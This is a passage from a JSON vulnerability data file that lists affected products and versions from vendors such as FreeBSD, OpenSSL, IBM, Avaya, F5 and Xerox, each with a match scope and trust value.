"iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x37508752" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "8.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "6.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5x" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "-release-p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p32", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5740061.132.224.35203" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "7.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36307158" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "campaign", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "8.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "bladecenter advanced management module 3.66g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "contact optimization", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1x" }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408737" }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "7.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0.x" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "release -p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2-" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2x" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7830" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "8.2-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x32502583" }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p38", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8900" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl 0.9.8zb", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x31002582" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "6.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.4" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1x" }, { "model": "9.3-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7970072.200.134.32804" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "8.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7220072.030.134.32804" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "8.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "colorqube r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9303072.180.134.32804" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9302" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.5" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "beta4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35307160" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "colorqube r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9301072.180.134.32804" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "7.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9301" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5755" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { 